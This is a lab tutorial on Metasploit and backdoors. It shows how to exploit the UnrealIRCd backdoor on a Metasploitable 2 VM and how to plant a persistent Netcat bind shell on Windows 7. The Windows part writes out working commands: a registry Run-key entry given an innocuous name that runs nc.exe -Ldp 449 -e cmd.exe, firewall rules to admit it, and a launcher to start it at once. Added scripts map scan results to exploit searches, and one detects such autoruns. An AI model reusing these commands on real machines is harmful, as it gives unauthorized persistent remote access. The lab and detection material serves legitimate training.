Backdooring Practical

This document provides instructions for using Metasploit to exploit vulnerabilities on a Metasploitable 2 virtual machine. It describes how to: 1. Launch Metasploit and use the unreal_ircd_3281_backdoor exploit to obtain a shell on the Metasploitable VM after identifying that port 6667 is open. 2. Use Metasploit to scan for open services, search for related exploits, and launch one by configuring options like LHOST and payload. 3. Create a Netcat backdoor on a Windows 7 system to listen on port 449 and execute cmd.exe using registry modifications, firewall rules, and a VBScript that runs Netcat automatically on

Uploaded by Simo Errafiy

METASPLOIT TUTORIAL

Intro:
Metasploitable 2 (download): https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 2 login: msfadmin / msfadmin
Kali Linux login: root / toor

1. On the Metasploitable VM, find its IP address (called VUL_IP below):

msfadmin@metasploitable:~$ ifconfig

VUL_IP is the "inet addr" shown for eth0 in the ifconfig output.


2. From Kali, confirm that port 6667 is open and running an IRC service (UnrealIRCd on Metasploitable 2):

nmap -sV -p 6667 VUL_IP
3. Launch Metasploit framework:
Go to: apps >>> kali linux >>> Top 10 security tools >>> metasploit framework
Or, from terminal, type: msfconsole

4. Select the exploit and set its options (LHOST = the attacker's Kali IP, where the reverse shell connects back to; RHOST = the victim, VUL_IP):

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor


msf exploit(unreal_ircd_3281_backdoor) > set LHOST KALI_IP
msf exploit(unreal_ircd_3281_backdoor) > set RHOST VUL_IP
msf exploit(unreal_ircd_3281_backdoor) > exploit

5. If everything is set up properly, you now have a shell on the Metasploitable VM. It is a plain command shell with no prompt, so just type commands and read the output.

- Run ls, pwd, id, cd, etc.

When you don’t know what services are exploitable:


1. Scan the target with db_nmap, which runs nmap and stores the results in Metasploit's database (the database must be connected; check with db_status first):

msf > db_nmap -v -sV VUL_IP

2. Check available services for that IP:

msf > services

3. Search exploits for specific services:

msf > search SERVICE_NAME

4. Choose an exploit for that service, then run it:

msf > use exploit/…

msf exploit(…) > exploit

(Do not forget to set RHOST, and LHOST for reverse payloads, before running exploit; show options lists which settings are required.)
5. Other things:
List the payloads compatible with the selected exploit, and select one:

msf exploit(…) > show payloads

msf exploit(…) > set PAYLOAD …

(Payloads are selected with set PAYLOAD from inside the exploit context, not with use, and the payload must match the platform the exploit lands on.)

Check options: msf exploit(…) > show options
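As an added example (not part of the original tutorial), the following Python script does by hand what db_nmap and services do inside Metasploit: it parses the XML that nmap -oX writes, keeps only the open ports together with the service and product nmap fingerprinted, answers the Step 2 question (is 6667 open and identified as irc?) and turns each product into a search term for msfconsole. The nmap XML embedded in it is constructed to look like a trimmed Metasploitable 2 scan; it is not real scan output, and the 192.168.56.101 address is made up.

```python
"""Parse nmap XML output (the format db_nmap stores) and derive msfconsole search terms."""
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed `nmap -sV -oX` result shaped like a Metasploitable 2
# scan. Written for this example, not captured from the lab VM.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.56.101">
  <host>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/>
      </port>
      <port protocol="tcp" portid="6667">
        <state state="open"/>
        <service name="irc" product="UnrealIRCd"/>
      </port>
      <port protocol="tcp" portid="8009">
        <state state="closed"/>
        <service name="ajp13"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return one record per *open* port: host, port, proto, name, product, version."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else None
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not attack surface
            svc = port.find("service")
            attr = svc.attrib if svc is not None else {}
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": attr.get("name"),
                "product": attr.get("product"),
                "version": attr.get("version"),
            })
    return services


def is_irc_open(services, port=6667):
    """Step 2 check: is the IRC port open and fingerprinted as irc?"""
    return any(s["port"] == port and s["proto"] == "tcp" and s["name"] == "irc"
               for s in services)


def suggest_searches(services):
    """One msfconsole `search` line per distinct product (falling back to the service name)."""
    seen, lines = set(), []
    for s in services:
        term = s["product"] or s["name"]
        if term and term not in seen:
            seen.add(term)
            lines.append(f"search {term}")
    return lines


if __name__ == "__main__":
    found = parse_services(SAMPLE_NMAP_XML)
    for s in found:
        print(f"{s['host']}:{s['port']}/{s['proto']} {s['name']} "
              f"{s['product'] or ''} {s['version'] or ''}".rstrip())
    print("irc on 6667:", is_irc_open(found))
    print("\n".join(suggest_searches(found)))
```

Against a real target, produce the input with `nmap -sV -oX scan.xml VUL_IP` and feed the file contents to parse_services; the lines from suggest_searches are typed straight into msf > search …, which is the same step the tutorial performs manually after services.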

Netcat backdoor for Windows 7 (for local LAN)


Tools you need:

- Windows 7 VM (IEUser / Passw0rd!)
- Kali Linux (root / toor)
- Netcat for Windows https://joncraton.org/blog/46/netcat-for-windows/
- Process Explorer https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx
- TCPView https://technet.microsoft.com/en-us/sysinternals/tcpview.aspx

Step 1: Have nc.exe in the system32 folder

- Copy nc.exe into C:\Windows\System32. (Dropping it among the system binaries makes it less conspicuous than a copy in a user folder; it does not hide the running process.)

NOTE: Steps 2-4 must be run from a cmd.exe started with administrator privileges (Run as administrator). If a command fails when pasted from a PDF, retype it by hand: the quotes and hyphens in converted documents are often typographic characters that cmd.exe does not accept, even though the line looks identical.

Step 2: Modifying the registry so nc.exe automatically starts after reboot

- reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

(In the Windows netcat port, -L keeps listening after a client disconnects, -d detaches nc.exe from the console so no window appears, -p 449 is the listening port, and -e cmd.exe hands cmd.exe to whoever connects. The value name "system" is chosen to look innocuous in the Run key.)

Step 3: Opening the listening port in the firewall (port 449 in this case)

- netsh advfirewall firewall add rule name="Nc 449" dir=in action=allow protocol=TCP localport=449

(nc.exe -L listens on TCP and the Kali side connects over TCP, so the rule must allow TCP; a UDP rule for the same port would not let the connection through. With the program rule from Step 4 in place this port rule is redundant, but it keeps the port open even if nc.exe is later moved or renamed.)

Step 4: Allowing netcat through the firewall.

- netsh advfirewall firewall add rule name="Allow messenger" dir=in action=allow program="C:\windows\system32\nc.exe"

Everything is now set up, but we do not want to wait for the user to restart the computer before netcat starts, so we create a VBScript that launches netcat right away.

Step 5: Creating a VBScript to run netcat immediately.

- Open Notepad, write the script (it launches C:\windows\system32\nc.exe with the same arguments as the Run key entry; the listing itself is not included in this copy), save it as a .vbs file and run it.

You can now use process explorer to verify that netcat is running. The process is called nc.exe.

Step 6: Getting the ipaddress.

- Use the command ipconfig to view the ip address of the machine (IPv4 Address in this case).

Step 7: Connecting to the backdoor on kali linux.

- In the kali terminal use the following command:


nc -v address port

*Where address is the ip address from Step 6 and port is 449.

If everything worked properly, you are connected to the target computer and have its cmd prompt open in the Kali terminal.

If someone looked at Process Explorer while netcat was connected, they would see cmd.exe running as a child of the nc.exe process (nc.exe spawns it through -e when a client connects).

In addition, TCPView shows the nc.exe listener on port 449 and the IP address of the Kali machine connected to it.

If the netcat process is killed by the user or crashes for some reason, it is not restarted automatically; the Run key only starts it again when the computer reboots. Trying to connect while nc.exe is not running on the target therefore fails with a connection error.
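The defender's view of Steps 2-6, as an added example that is not part of the original tutorial: this Python script takes the text output of `reg query HKLM\software\microsoft\windows\currentversion\run` and of `netstat -ano`, flags Run-key entries that launch a netcat binary or hand a shell to the remote peer with -e, extracts the listening port from the command line, and reports which PID is listening on that port (the PID you would then look up in Process Explorer or TCPView). The two command outputs embedded below are constructed for the example, including the hypothetical PID 2876, the 192.168.56.x addresses and the VMware entry used as a benign control.

```python
"""Defender-side check for the Run-key netcat backdoor: flag bind-shell autoruns in
`reg query` output and correlate them with TCP listeners from `netstat -ano`."""
import re

# Constructed sample output of:
#   reg query HKLM\software\microsoft\windows\currentversion\run
# Written for this example (the VMware entry is a benign control), not captured from a host.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    system    REG_SZ    C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe
"""

# Constructed sample output of `netstat -ano` on the same host; PID 2876 is hypothetical.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:449            0.0.0.0:0              LISTENING       2876
  TCP    192.168.56.102:449     192.168.56.103:51234   ESTABLISHED     2876
  UDP    0.0.0.0:500            *:*                                    932
"""

NETCAT_BINARY = re.compile(r"\b(nc|nc64|ncat|netcat)\.exe\b", re.IGNORECASE)
# `-e cmd.exe` / `-e powershell`: hands a shell to whoever connects.
EXEC_SHELL = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.IGNORECASE)
# `-Ldp 449`, `-lp 449`, `-p 449`: the port a netcat listener binds.
LISTEN_PORT = re.compile(r"\s-[A-Za-z]*p\s*(\d+)\b")


def parse_run_key(text):
    """Return (value_name, command_line) pairs from `reg query` output.

    reg.exe separates its columns with four spaces, so splitting on that keeps
    value names and command lines that contain single spaces intact."""
    entries = []
    for line in text.splitlines():
        cols = [c for c in line.strip().split("    ") if c]
        if len(cols) == 3 and cols[1].upper() in ("REG_SZ", "REG_EXPAND_SZ"):
            entries.append((cols[0], cols[2]))
    return entries


def parse_listeners(text):
    """Map local TCP port -> set of PIDs in LISTENING state from `netstat -ano` output."""
    listeners = {}
    for line in text.splitlines():
        cols = line.split()
        if len(cols) == 5 and cols[0].upper() == "TCP" and cols[3] == "LISTENING":
            port = int(cols[1].rsplit(":", 1)[1])
            listeners.setdefault(port, set()).add(int(cols[4]))
    return listeners


def flag_autoruns(entries, listeners):
    """Flag Run-key commands that look like a netcat bind shell; attach the listening PIDs."""
    findings = []
    for name, cmd in entries:
        reasons = []
        if NETCAT_BINARY.search(cmd):
            reasons.append("launches a netcat binary")
        if EXEC_SHELL.search(cmd):
            reasons.append("executes a shell for the remote peer (-e)")
        if not reasons:
            continue  # a bare -p option on its own is not evidence
        m = LISTEN_PORT.search(cmd)
        port = int(m.group(1)) if m else None
        findings.append({
            "value_name": name,
            "command": cmd,
            "reasons": reasons,
            "port": port,
            # empty list = the Run key is armed but nothing is listening right now
            "listening_pids": sorted(listeners.get(port, ())) if port is not None else [],
        })
    return findings


if __name__ == "__main__":
    hits = flag_autoruns(parse_run_key(SAMPLE_REG_QUERY), parse_listeners(SAMPLE_NETSTAT))
    for h in hits:
        print(f"[!] Run\\{h['value_name']}: {h['command']}")
        print("    why:", "; ".join(h["reasons"]))
        print(f"    port {h['port']} listening PIDs: {h['listening_pids'] or 'none (not running)'}")
```

An empty listening_pids list with a flagged Run-key entry is exactly the state the last paragraph describes: nc.exe was killed or crashed, the backdoor is dormant until the next reboot, and the registry value is the artifact to remove. On a live host, feed the script the real command outputs (for example saved with `reg query ... > run.txt` and `netstat -ano > net.txt`); the regular expressions are heuristics and will miss a renamed binary, so treat a hit as a lead to confirm in Process Explorer, not as proof.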
